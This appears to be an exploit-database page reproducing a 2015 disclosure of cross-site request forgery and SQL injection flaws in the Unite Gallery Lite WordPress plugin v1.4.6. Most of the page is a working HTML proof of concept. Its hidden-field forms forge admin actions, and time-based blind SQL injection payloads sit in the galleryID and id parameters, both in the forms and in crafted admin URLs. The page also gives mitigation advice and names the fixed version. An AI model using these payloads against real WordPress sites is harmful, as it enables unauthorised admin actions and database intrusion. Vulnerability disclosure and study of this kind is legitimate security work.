header-logo
Suggest Exploit
vendor:
Unite Gallery Lite Wordpress Plugin
by:
Nitin Venkatesh
8.8
CVSS
HIGH
Cross-site Request Forgery [CWE-352], Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')[CWE-89]
352, 89
CWE
Product Name: Unite Gallery Lite Wordpress Plugin
Affected Version From: v1.4.6
Affected Version To: v1.4.6
Patch Exists: YES
Related CWE: New & Unassigned
CPE: 2.3:a:wordpress:unite_gallery_lite:1.4.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Cross-Site Request Forgery & SQL Injection Vulnerabilities in Unite Gallery Lite WordPress Plugin v1.4.6

The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible to CSRF. Additionally, the following parameters were found to be susceptible to SQLi - Form submitted to /wp-admin/admin-ajax.php: - data[galleryID] Form submitted to /wp-admin/admin.php: - galleryid - id

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in an SQL query. Additionally, ensure that all forms are protected against CSRF attacks.
Source

Exploit-DB raw data:

# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in Unite Gallery Lite Wordpress Plugin v1.4.6
# Submitter: Nitin Venkatesh
# Product: Unite Gallery Lite Wordpress Plugin
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper
Neutralization of Special Elements used in an SQL Command ('SQL
Injection')[CWE-89]
# Affected Versions: v1.4.6 and possibly below.
# Tested versions: v1.4.6
# Fixed Version: v1.5
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
# CVE Status: New & Unassigned

## Product Information:

The Unite Gallery is all in one image and video gallery for WordPress.

## Vulnerability Description:

The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible
to CSRF. Additionally, the following parameters were found to be
susceptible to SQLi -

Form submitted to /wp-admin/admin-ajax.php:
- data[galleryID]

Form submitted to /wp-admin/admin.php:
- galleryid
- id

## Proof of Concept:

<!DOCTYPE html>
<html>
<head>
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>
</head>
<body>
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>
<p>CSRF - Create Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='create_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][category]" value='new' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Update Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='update_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][shortcode]" value='[unitegallery
test2]' />
<input type="hidden" name="data[main][category]" value='3' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="hidden" name="data[main][gallery_min_width]" value='150' />
<input type="hidden" name="data[params][tile_width]" value='160' />
<input type="hidden" name="data[params][tile_height]" value='160' />
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
<input type="hidden" name="data[params][theme_carousel_align]"
value='center' />
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />
<input type="hidden" name="data[params][tile_image_resolution]"
value='medium' />
<input type="hidden" name="data[params][carousel_padding]" value='8' />
<input type="hidden" name="data[params][carousel_space_between_tiles]"
value='20' />
<input type="hidden" name="data[params][carousel_scroll_duration]"
value='500' />
<input type="hidden" name="data[params][carousel_scroll_easing]"
value='easeOutCubic' />
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />
<input type="hidden" name="data[params][carousel_autoplay_timeout]"
value='3000' />
<input type="hidden" name="data[params][carousel_autoplay_direction]"
value='right' />
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"
value='true' />
<input type="hidden" name="data[params][theme_enable_navigation]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_enable_play]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_align]"
value='center' />
<input type="hidden" name="data[params][theme_navigation_offset_hor]"
value='0' />
<input type="hidden" name="data[params][theme_navigation_position]"
value='bottom' />
<input type="hidden" name="data[params][theme_navigation_margin]"
value='20' />
<input type="hidden" name="data[params][theme_space_between_arrows]"
value='5' />
<input type="hidden" name="data[params][carousel_navigation_numtiles]"
value='3' />
<input type="hidden" name="data[params][position]" value='center' />
<input type="hidden" name="data[params][margin_top]" value='0' />
<input type="hidden" name="data[params][margin_bottom]" value='0' />
<input type="hidden" name="data[params][margin_left]" value='0' />
<input type="hidden" name="data[params][margin_right]" value='0' />
<input type="hidden" name="data[params][tile_enable_action]" value='true' />
<input type="hidden" name="data[params][tile_as_link]" value='false' />
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />
<input type="hidden" name="data[params][tile_enable_border]" value='true' />
<input type="hidden" name="data[params][tile_border_width]" value='3' />
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'
/>
<input type="hidden" name="data[params][tile_border_radius]" value='0' />
<input type="hidden" name="data[params][tile_enable_outline]" value='true'
/>
<input type="hidden" name="data[params][tile_outline_color]"
value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_shadow]" value='false'
/>
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'
/>
<input type="hidden" name="data[params][tile_enable_image_effect]"
value='false' />
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw'
/>
<input type="hidden" name="data[params][tile_image_effect_reverse]"
value='false' />
<input type="hidden" name="data[params][tile_enable_overlay]" value='true'
/>
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'
/>
<input type="hidden" name="data[params][tile_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />
<input type="hidden" name="data[params][tile_show_link_icon]" value='false'
/>
<input type="hidden" name="data[params][tile_space_between_icons]"
value='26' />
<input type="hidden" name="data[params][tile_enable_textpanel]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][tile_textpanel_always_on]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_appear_type]"
value='slide' />
<input type="hidden" name="data[params][tile_textpanel_padding_top]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_left]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_padding_right]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_bg_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]"
value='0.6' />
<input type="hidden" name="data[params][tile_textpanel_title_color]"
value='#ffffff' />
<input type="hidden" name="data[params][tile_textpanel_title_text_align]"
value='left' />
<input type="hidden" name="data[params][tile_textpanel_title_font_size]"
value='14' />
<input type="hidden" name="data[params][tile_textpanel_title_bold]"
value='true' />
<input type="hidden" name="data[params][lightbox_type]" value='wide' />
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"
value='true' />
<input type="hidden" name="data[params][lightbox_slider_control_zoom]"
value='true' />
<input type="hidden" name="data[params][gallery_mousewheel_role]"
value='zoom' />
<input type="hidden" name="data[params][lightbox_overlay_opacity]"
value='1' />
<input type="hidden" name="data[params][lightbox_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_top_panel_opacity]"
value='0.4' />
<input type="hidden" name="data[params][lightbox_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14'
/>
<input type="hidden" name="data[params][lightbox_numbers_color]"
value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_textpanel_width]"
value='550' />
<input type="hidden" name="data[params][lightbox_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][lightbox_textpanel_title_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_text_align]" value='left' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"
value='0.6' />
<input type="hidden" name="data[params][lightbox_compact_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_arrows_position]"
value='sides' />
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_numbers_size]"
value='14' />
<input type="hidden" name="data[params][lightbox_compact_numbers_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]"
value='title' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border]" value='true' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_width]" value='10'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_color]"
value='#ffffff' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_radius]" value='0'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
<input type="hidden" name="data[params][include_jquery]" value='true' />
<input type="hidden" name="data[params][js_to_body]" value='false' />
<input type="hidden" name="data[params][compress_output]" value='false' />
<input type="hidden" name="data[params][gallery_debug_errors]"
value='false' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p>CSRF - Add Items</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='add_item' />
<input type="hidden" name="gallery_type" value='' />
<input type="hidden" name="data[type]" value='html5video' />
<input type="hidden" name="data[title]" value='test' />
<input type="hidden" name="data[description]" value='' />
<input type="hidden" name="data[urlImage]" value='' />
<input type="hidden" name="data[urlThumb]" value='' />
<input type="hidden" name="data[urlVideo_mp4]" value='
http://video-js.zencoder.com/oceans-clip.mp4' />
<input type="hidden" name="data[urlVideo_webm]" value='
http://video-js.zencoder.com/oceans-clip.webm' />
<input type="hidden" name="data[urlVideo_ogv]" value='
http://video-js.zencoder.com/oceans-clip.ogv' />
<input type="hidden" name="data[catID]" value='4' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='get_cat_items' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[catID]" value='3' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p> CSRF + SQLi - Action buttons</p>
<ul>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a></li>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a>
</li>
</ul>
</body>
</html>

## Solution:

Upgrade to v1.5 or higher

## Disclosure Timeline:

2015-06-06 - Discovered. Reported to developer.
2015-06-10 - Updated version released.
2015-07-25 - Publishing disclosure on FD mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

Navigation

Suggest Exploit

Services By CQR